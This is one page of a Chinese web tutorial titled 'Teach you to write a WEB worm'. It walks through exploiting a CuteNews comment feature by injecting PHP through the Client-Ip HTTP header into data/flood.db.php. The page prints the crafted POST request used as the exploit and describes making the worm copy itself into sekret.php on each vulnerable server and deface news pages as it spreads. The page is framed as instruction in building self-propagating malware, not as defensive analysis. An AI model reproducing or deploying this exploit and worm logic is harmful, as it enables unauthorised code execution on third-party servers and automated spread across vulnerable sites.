WEB开发网
开发学院网络安全黑客技术 教你编写WEB蠕虫 阅读

教你编写WEB蠕虫

 2009-06-12 16:54:59 来源:WEB开发网   
核心提示: 接下来的工作就仅仅只是构造一个适合的HTTP request,以利用漏洞,并进行自我复制以感染系统,教你编写WEB蠕虫(2),当有人对文章发表评论时,CuteNews便将信息写入data/flood.db.php文件中,以备运行,你可以在Client-Ip未端添加一些payload,通过运

接下来的工作就仅仅只是构造一个适合的HTTP request,以利用漏洞,并进行自我复制以感染系统。当有人对文章发表评论时,CuteNews便将信息写入data/flood.db.php文件中。通过Client-Ip HTTP header传输数据,你就可以向这个文件注入PHP代码。

  $packet = str_replace("n","nr",
  "POST
  $location/example2.php?subaction=showcomments&id=1128188313&archive=&start_from=
  &ucat=& HTTP/1.1
  Accept: */*rnAccept-Language: en
  Accept-Encoding: gzip, deflate
  Client-Ip:
  User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.6
  (KHTML, like Gecko) Safari/412.2
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 107
  Connection: close
  Host: $domain
  name=haxitup&mail=&comments=j00+haxed+%3Alaughing%3A&submit=Add+My+Comment&
  subaction=addcomment&ucat=&show=
  ";

如果我们创建了这些请求,那么就可以通过Client-Ip将PHP代码写入到flood.db.php文件中,然后我们就可以通过一个正规的GET请求来执行代码了。既然可以将PHP代码执行的过程自动化,那么我们就可以开始着手准备去如何编写病毒代码,以实现其自我繁殖并植入payload的功能。下面的例子将复制整个蠕虫代码到漏洞服务器上的sekret.php文件中,以备运行。你可以在Client-Ip未端添加一些payload,通过运行sekret.php使其在news.txt顶端中添加一新标题,让每个存在漏洞的CuteNews站点都发表一新闻帖。

上一页  1 2 3 4 5  下一页

Tags:编写 WEB 蠕虫

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接